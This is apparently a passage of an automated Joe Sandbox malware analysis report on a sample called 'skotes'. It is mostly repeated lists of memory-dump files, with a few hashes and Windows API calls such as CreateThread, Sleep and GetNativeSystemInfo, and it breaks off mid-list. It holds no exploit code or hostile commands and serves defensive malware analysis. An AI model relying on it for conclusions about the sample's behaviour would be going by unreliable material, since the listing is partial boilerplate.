                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID: HV
                                                                                                                                                                • API String ID: 3472027048-1037838562
                                                                                                                                                                • Opcode ID: b0b7ed15f2b648e712341516962b0fc8a4a03c5dcca4fe76b29691c8b807446a
                                                                                                                                                                • Instruction ID: 9c96dbc8f416f93db132789e5eb02ff591b649828a8c12f2a8ffd935cc6ec426
                                                                                                                                                                • Opcode Fuzzy Hash: b0b7ed15f2b648e712341516962b0fc8a4a03c5dcca4fe76b29691c8b807446a
                                                                                                                                                                • Instruction Fuzzy Hash: B4F0A971A50654A7CB117B799D07B1EBBF8EB07760F8007A8E411672E1DF741A044BD2
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00B96D11
                                                                                                                                                                • Sleep.KERNEL32(00007530), ref: 00B96D25
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateSleepThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4202482776-0
                                                                                                                                                                • Opcode ID: 799ab94a10c78b6439a7829b1b1cc5bed758666059d17bb2bdd450ab4f9d3b7d
                                                                                                                                                                • Instruction ID: 4d0528afde261e753611e1ada04c41dd334ac81091dc2e42899916e5e588aaa0
                                                                                                                                                                • Opcode Fuzzy Hash: 799ab94a10c78b6439a7829b1b1cc5bed758666059d17bb2bdd450ab4f9d3b7d
                                                                                                                                                                • Instruction Fuzzy Hash: C1D08C707D1318B7FA2013212C0BF26AB60DB0AF80F6518A077083F0E08AE0340047EC
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B88524
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                • Opcode ID: 504f0717c8503b95bd4ee09ea4623a1cb93a53e8b26965e370a2238558e8f882
                                                                                                                                                                • Instruction ID: 25d1533564939ca20ec96321eb9f41e35bf6eff1c212eb62206b264685c306a0
                                                                                                                                                                • Opcode Fuzzy Hash: 504f0717c8503b95bd4ee09ea4623a1cb93a53e8b26965e370a2238558e8f882
                                                                                                                                                                • Instruction Fuzzy Hash: 8E51F471D102589BDB24FB68CD85BDDB7B4EB45314F9042E8E809A72A1EF349E84CB91
                                                                                                                                                                APIs
                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00BB705B,?,?,00000000,00000000), ref: 00BB7166
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Time$LocalSpecificSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2574697306-0
                                                                                                                                                                • Opcode ID: defa404f24d9605ffa53791b134aeff351ae50ca22411c5693b8044c8b4ade58
                                                                                                                                                                • Instruction ID: 1e4280bdca6118abbfc4aa278c05c5d5dd0943e6b99ede23996c2452f7335067
                                                                                                                                                                • Opcode Fuzzy Hash: defa404f24d9605ffa53791b134aeff351ae50ca22411c5693b8044c8b4ade58
                                                                                                                                                                • Instruction Fuzzy Hash: BF11EC7294410DABDB10DF99C985EEF77FCAF48310F6052A6E511F6180EA70EA49CB71
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
